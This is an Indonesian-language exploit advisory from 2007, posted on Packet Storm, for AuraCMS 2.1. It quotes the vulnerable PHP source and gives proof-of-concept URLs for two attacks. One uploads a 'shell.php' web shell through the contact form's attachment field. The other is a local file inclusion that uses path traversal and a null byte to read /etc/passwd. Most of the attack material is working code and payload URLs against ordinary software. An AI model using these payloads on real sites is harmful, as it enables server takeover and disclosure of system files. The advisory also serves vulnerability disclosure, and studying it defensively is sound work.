what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

auracms21-lfi.txt

auracms21-lfi.txt
Posted Sep 10, 2007
Authored by k1tk4t

AuraCMS version 2.1 suffers from remote file attachment and local file inclusion vulnerabilities.

tags | exploit, remote, local, vulnerability, file inclusion
SHA-256 | 701c6da9045815b7b14d3950421c198c9ea721b4f767519a29d154f07e3791eb

auracms21-lfi.txt

Change Mirror Download
########################################################################
# AuraCMS 2.1 - Remote File Attachment - Local File Inclusion
# Vendor : http://www.auracms.org/
# Download : http://www.auracms.org/dl_jump.php?id=42
# Ditemukan oleh : k1tk4t - k1tk4t[4t]newhack.org
# Lokasi : Indonesia -- #newhack[dot]org @ irc.dal.net
########################################################################
====================================
Remote File Attachment Vulnerability
====================================

//berkas pada '/mod/contak.php'
---------------- Baris-41 --------------------
if ($_POST['submit']) {


$nama = text_filter($_POST['nama']);

$email = text_filter($_POST['email']);

$pesan = nl2br(text_filter($_POST['pesan'], 2));

$images = text_filter($_POST['image']);



checkemail($email);

$gfx_check = intval($_POST['gfx_check']);

if (!$nama) $error .= "Error: Please enter your name!<br />";

if (!$pesan) $error .= "Error: Please enter a message!<br />";



$code = substr(hexdec(md5("".date("F j")."".$_POST['random_num']."".$sitekey."")), 2, 6);

if (extension_loaded("gd") AND $code != $_POST['gfx_check']) $error .= "Error: Security Code Invalid<br />";



if ($error) {

$tengah.='<table width="100%" border="0" cellspacing="0" cellpadding="0" class="middle"><tr><td><table width="100%" class="bodyline"><tr><td align="left"><img src="images/warning.gif" border="0"></td><td align="center"><font class="option">'.$error.'</font></td><td align="right"><img src="images/warning.gif" border="0"></td></tr></table></td></tr></table>';

} else {



if (!empty ($image_name)){

$image_name = $_FILES['image']['name'];

$image_temp = $_FILES['image']['tmp_name'];

$tempat = "files/";



@copy($_FILES[image][tmp_name], "./files/".$image_name);

if(@copy($_FILES[image][tmp_name], "./files/".$image_name)){

unlink($image);

$sukses = "Sukses Upload File ".$image_name;

}else{

$sukses = "Gagal Upload File ".$image_name;

---------------- Baris-61 --------------------

pemfilteran "$images" tidak sempurna, sehingga pengguna dapat mengupload/attachment file yang tidak diinginkan kedalam direktori /files/.

//POC;

http://localhost/auracms2.1/index.php?pilih=../mod/contak

atau

http://localhost/auracms2.1/index.php?pilih=contak&mod=yes

isi semua konten isian, masukan angka 'security code' dengan benar, "Attachment" --> shell.php ;

http://localhost/auracms2.1/files/shell.php



===================================
Local File Inclusion Vulnerability
===================================

//berkas pada '/index.php' - AuraCMS versi 2.x

--------- baris-24 ----------
if (isset ($_GET['mod'])) $mod = $_GET['mod'] ; else $mod = '';




if(!isset($_GET['pilih'])){

include 'content/normal.php';

}else {




if($mod == "yes" && file_exists("mod/$_GET[pilih].php")){

include "mod/$_GET[pilih].php";

} else {



if (eregi('http://', $_GET['pilih']) or !file_exists("content/$_GET[pilih].php") or $_GET['pilih'] == 'index'){

$_GET['pilih'] = 'normal';
--------- baris-39 ----------


//berkas pada '/index.php' - AuraCMS versi 1.x

--------- baris-13 ----------
<?
if(!isset($pilih))$pilih='';
switch($pilih){
case '':
include "normal.php";
break;
default:
if($mod == "yes" && file_exists("mod/$pilih.php")){

include "mod/$pilih.php";
} else {
if (eregi('http://', $pilih) or !file_exists("$pilih.php")){
$pilih = 'normal';
}
include "$pilih.php";
}
break;
}
?>
--------- baris-33 ----------

need magic_quotes_gpc = off ,
jika magic_quotes_gpc = off maka pengguna dapat memanipulasi $pilih

//POC;

http://localhost/auracms.x.x/index.php?pilih=../../../../../../../etc/passwd%00

########################################################################
Terimakasih untuk;
str0ke, DNX
xoron,iFX,x-ace,nyubi,arioo,selikoer,k1n9k0ng,aldy_BT,adhietslank
dan semua temen2 komunitas security&hacking
-----------------------
-newhack[dot]org|staff-
mR.opt1lc ,fusion,fl3xu5,PusHm0v,Ghoz,bius,iind_id,slackX
-----------------------
all member newhack[dot]org
-----------------------
all member www.echo.or.id
-----------------------
all member www.yogyafree.net
-----------------------
all member www.sekuritionline.net
-----------------------
all member www.kecoak-elektronik.net
-----------------------
semua komunitas hacker&security Indonesia
Cintailah Bahasa Indonesia


Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close